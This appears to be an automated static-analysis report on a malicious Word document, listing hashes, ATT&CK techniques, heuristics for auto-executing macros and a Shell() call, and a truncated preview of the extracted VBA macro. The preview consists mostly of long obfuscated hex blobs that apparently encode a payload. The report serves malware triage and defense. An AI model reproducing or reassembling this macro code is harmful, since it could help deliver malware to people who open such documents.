Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 3f3372131de3c6be…

MALICIOUS

Office (OLE)

66.5 KB Created: 2018-03-21 22:24:00 Authoring application: Microsoft Office Word First seen: 2019-01-31
MD5: e648cc9b0f68f1b79e173fe1b6024929 SHA-1: c6695f8c25f51ebf550e1f508a9976b55e1451f5 SHA-256: 3f3372131de3c6be29bea1f745203921c8bf626682963209f8e9bff4ee7d6754
264 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1204.002 Malicious File T1059 Command and Scripting Interpreter

The sample contains VBA macros, including a Document_Open and Workbook_Open auto-execution macro, which is a strong indicator of malicious intent. The critical heuristic firing for Shell() call in VBA, combined with the presence of a VBA macro file named 'macros.bas', suggests that the macro is designed to execute arbitrary commands, likely to download and run a secondary payload. The ClamAV detection further confirms its malicious nature.

Heuristics 8

  • ClamAV: Xls.Malware.Cwsp-6735643-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Xls.Malware.Cwsp-6735643-0
  • VBA macros detected medium 4 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • Shell() call in VBA critical OLE_VBA_SHELL
    Shell() call in VBA
  • Document_Open macro high OLE_VBA_DOCOPEN
    Document_Open macro
  • Workbook_Open macro high OLE_VBA_WBOPEN
    Workbook_Open macro
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGE
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 20157 bytes
SHA-256: 3c03eeaedb6ec4a7a3e8d2bf76032769ed41b5c5000b13530df9f143e5eb786c
Detection
ClamAV: No threats found
Obfuscation or payload: likely
Carved artifact contains 69 long base64-like blob(s).
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Option Explicit


Public Sub J_EMZ()
   Dim K_J As String
   Dim YIH_MM As String
   Dim TJ_VTS As String
TJ_VTS = "AFBD8484848484845184846B846184655CB384B0849D848484ABA984AD848484837575719BB684A6A084845584848584848D488484AF7F8484709B9165887F56B99F84BB848484594F8184848484BB848484B98484A384847DC18A7F59808E8484848446848190848484B75684849EBC84A"
Dim WTT_OC As String
WTT_OC = "284846B84848A8484844684798C9184B9845E846DB1846C846C84849EC08484848284848D84848459848461838484B08484844786848484845E84BF6484AC4FB7B584846C848484845D4F89A284848484847484848F848EA381C0848484B184788084535D964F84866D847A846C8484C284"
Dim B_VO As String
B_VO = "7CAC846A849C849F5D60818484B2848484608484846A848467846EAA9846844A84849C845B5984958484844A849A91846BB6BB84847457844847848684845FAC8484848C5B844C4A7D84788484878484848456BB8484845981844672848445A1C3945484B484848484B7B68B84518484C48"
Dim KKT_RL As String
KKT_RL = "486848484845A84844A7D84798487755460849A8484688484AF849090695F84848284848C8484798484848456848484B9846E848484A28484849984598453A084848484BB63668484A78484848484BD84849C83844675A48470978465B884847F80845084B44D848493846C84474C8486A9"
Dim CML_SN As String
CML_SN = "91846284B6AD848484A78484848473B28484B18461938484BB7C846E90508453A05F84A284B6849BC27F8152A4847E8484AC848475AEC28484847684849C8484845584B884A18459A884988484638484A74EA0708460AD84BBB7848484847EC365AB7184BB7A519B849A5F5E84897884798"
Dim XSP_EW As String
XSP_EW = "48484B967BE8462849B8484A2C38484848455B371844A84A1459492778384C45D84B384848984849E7D8484848484BC8484848469758484C48484BE9C84845C84B08A847884849784785A848CC184A9A9848484729F846A84BD84C27E8484B284847F84508884848EBD8460844884A759C4"
Dim VT_Q As String
VT_Q = "778BBA8456A2AF84A85E844A8484848484849E8484849D84AD849661BA84606A4A9C6B6E846E9A8484B584B9B8888491846C74848484AE84624B84845DB98474848478A5C38484A084849D5D848669804A849284AFAF5F845184C40D8384BE848484A284A377849A464D56B07F869B58798"
Dim ZY_LI As String
ZY_LI = "4BB93BA848984B75A53847584846C8484845F845F5D5AAD56847C846084B2B94E8448B262525D728462848484AA8084575B84BD849884A27D52C0AD848484586F8484848484C184848484849D848484AF84498484C084A0847A548484848F68C3845A848C769E84C48451A2848484BA8484"
Dim XJ_DZT As String
XJ_DZT = "608484597A848484845A8A84844C91849E7EAAC48487B49C848499848484AD73AFA1848481844884848484845F8484B184C1BA848484846B74846C7084878484AD8484848484C1848469847F8484C1848484AE4AA0845B8461B2B651B44976848C848484848484936D846B84859884569B8"
Dim K_QJK As String
K_QJK = "484848484848484A4C378847B6584A384844684745F84BA8F84845E84845D58AF84849E484684846E608484849DB184BB84959A758484846CB9848084A9B5846251A884848484466C4A849484848884848484848484847684508459BA84B8848468848384984D8484BFA684A38484848484"
Dim A_P As String
A_P = "9F6E844E84976C8483588598A8789B8484848460B5848584A08484F4494D847C8EAA8480845B845A8497845B7398848F84555884849495668484884CB8848090B3845281658455BD86A084849A898484848484845F928459B084628484B05B8B84778BC46E5F84848484AFA7848C845B848"
Dim H_VR As String
H_VR = "C9B9884576C848484B484BE845384B490B69B84849F8484848484AB816684848484849984789DB87452846E84848484B6AA84848498848484BA5C848484844E844D638C845C5E8484A99D846C84845B5884C0848484A1849CB6BA84738484A884938484B6B084BD4D84927B8484BA844D84"
Dim HPQ_ZC As String
HPQ_ZC = "70849CAA7B8484848461B684879D89B2849F8D55A04F84846B84B28484846A84B78473849A7684848484B58484B5849F568484C1848484A584678E4E8B9084845A847A6D847984B884A48477B58494847EABBE8484A7978484849F848469846984848484B74E8C5E8A717B847384A084865"
Dim ZM_D As String
ZM_D = "1847A718477849C66C0A184847F8453847CBF8484A27784847A6147844CA2A5908484848484849F608484A3778484648469C49B8A84488479C25AC3845F638484A584765B849F8484BAAB848547658984777D84849884849884A48484AC8484848446844E84849856848484BF847F758484"
Dim V_C As String
V_C = "5F845287B6846A848F8489848450C2756484BF78B37D74848468
... (truncated)